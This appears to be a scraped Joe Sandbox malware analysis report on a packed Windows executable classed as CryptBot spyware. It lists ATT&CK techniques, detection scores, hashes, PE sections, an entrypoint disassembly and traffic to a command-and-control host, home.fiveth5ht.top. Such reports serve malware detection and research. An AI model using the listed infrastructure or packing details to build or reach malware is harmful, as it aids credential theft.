Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sYPORwmgwQ.exe	46%	Virustotal		Browse
sYPORwmgwQ.exe	55%	ReversingLabs	Win32.Trojan.CryptBot
sYPORwmgwQ.exe	100%	Avira	TR/Crypt.TPM.Gen
sYPORwmgwQ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	0%	Avira URL Cloud	safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
home.fiveth5ht.top	81.29.149.125	true	false	high
httpbin.org	34.226.108.155	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862	false		high
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17	sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://html4/loose.dtd	sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
https://httpbin.org/ipbefore	sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/http-cookies.html	sYPORwmgwQ.exe, sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/hsts.html#	sYPORwmgwQ.exe	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS	sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	sYPORwmgwQ.exe, 00000000.00000003.2171962564.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171979311.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174310980.0000000001A59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.css	sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.jpg	sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse	sYPORwmgwQ.exe, 00000000.00000003.2171962564.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171979311.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174310980.0000000001A59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.226.108.155	httpbin.org	United States		14618	AMAZON-AESUS	false
81.29.149.125	home.fiveth5ht.top	Switzerland		39616	COMUNICA_IT_SERVICESCH	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581587
Start date and time:	2024-12-28 09:33:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sYPORwmgwQ.exe renamed because original name is a hash value
Original Sample Name:	095505c3a10c05a5301b5e4c34464ac3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:34:52	API Interceptor	3x Sleep call for process: sYPORwmgwQ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.226.108.155	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
81.29.149.125	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
home.fiveth5ht.top	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
bg.microsoft.map.fastly.net	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	wp.bat	Get hash	malicious	Unknown	Browse	199.232.210.172
	final.exe	Get hash	malicious	Meterpreter	Browse	199.232.214.172
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	199.232.214.172
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	199.232.210.172
	54861 Proforma Invoice AMC2273745.xlam.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	C8QT9HkXEb.exe	Get hash	malicious	LummaC	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMUNICA_IT_SERVICESCH	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS	Browse	81.29.149.45
	hmips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	ppc.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	mips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	x86.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	hmips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	arm5.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	ppc.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	harm4.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
AMAZON-AESUS	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	54.225.146.64
	d8tp5flwzP.exe	Get hash	malicious	Metasploit	Browse	18.209.65.151
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	3.218.7.103
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.985724603826821
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sYPORwmgwQ.exe
File size:	4'464'640 bytes
MD5:	095505c3a10c05a5301b5e4c34464ac3
SHA1:	c9e2e01414f9cfd74e8494ff24d03b2b0f6d9606
SHA256:	1a8051de2e50150f00fcd93bbbe527f14bdc79486dfa40733cd904dd9dd0bc08
SHA512:	921943c6845e1d6d8c44292392bb5dc44dd1296d3b48e24c92ba6a2e2714772c71d5292f84a1b604627a8c8996135bf49f0ae935c993547724e8d8c0b9de7580
SSDEEP:	98304:+3NSfks3bnPf6BS5bMZdm3W4ac4UtIo5ukNQ:+9SfPyBubcAa2Ioj+
TLSH:	8B2633A6E8D57574C0DFE17BA4E16736A360CEC4604BE3C1348C656E8F0613BE878A27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x101e000
Entrypoint Section:	.taggant
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007F1DED46B30Ah
paddd mm0, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F1DED46D305h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6dd05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6dc000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x708a00	0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc1c740	0x10	sbkcwdwk
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc1c6f0	0x18	sbkcwdwk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x6db000	0x288a00	e69938805df36869507dd60430a7fb15	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6dc000	0x1ac	0x200	9b78b27978fc9969259f1ef4a8adfb67	False	0.58203125	data	4.520004410327368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6dd000	0x1000	0x200	6363462e4ea156e03144265f6be7871e	False	0.166015625	data	1.1763897754724144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6de000	0x389000	0x200	ca80cd8952c2bdfc9f04ef3416df046e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sbkcwdwk	0xa67000	0x1b6000	0x1b5a00	cad6d5b03bbe3975777f75b2efbcac5d	False	0.9943872063339046	data	7.954868506160059	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xxoohpui	0xc1d000	0x1000	0x400	ba2d191454fb54426e2166dcbaf57ce7	False	0.8115234375	data	6.257356523554564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xc1e000	0x3000	0x2200	558f14a928f20de16b05b6763f4ce43e	False	0.08329503676470588	DOS executable (COM)	0.9301846445953766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc1c750	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:34:47.057025909 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:47.057075977 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:47.057145119 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:47.079134941 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:47.079165936 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:48.943878889 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:48.944552898 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:48.944585085 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:48.946296930 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:48.946382999 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:48.947782040 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:48.947890997 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:48.953363895 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:48.953376055 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:49.003344059 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:49.468194962 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:49.468353033 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:49.468409061 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:49.481522083 CET	49704	443	192.168.2.5	34.226.108.155
Dec 28, 2024 09:34:49.481554985 CET	443	49704	34.226.108.155	192.168.2.5
Dec 28, 2024 09:34:51.665153027 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.784637928 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.784733057 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.785990953 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.905690908 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905706882 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905731916 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905741930 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905750990 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905761003 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905836105 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.905842066 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905865908 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.905873060 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905899048 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.905926943 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:51.905930042 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905941963 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:51.905985117 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025309086 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025414944 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025422096 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025427103 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025460958 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025482893 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025497913 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025538921 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025609970 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025655985 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.025655985 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.025711060 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.066956043 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.067071915 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.186712980 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.186858892 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.230906963 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.231009960 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.350541115 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.350647926 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.510956049 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.511111021 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.711639881 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.711699009 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.840323925 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.840493917 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.840590000 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960231066 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960269928 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960339069 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960345030 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960405111 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960407972 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960454941 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960544109 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960553885 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960597038 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960639000 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960688114 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960689068 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960730076 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960813046 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960858107 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.960860014 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960901976 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.960958004 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961003065 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.961066008 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961110115 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961112976 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.961158037 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.961186886 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961240053 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.961281061 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961405039 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961491108 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961574078 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961682081 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961765051 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961853027 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.961954117 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962019920 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962146044 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962198019 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962243080 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962318897 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962352037 CET	80	49705	81.29.149.125	192.168.2.5
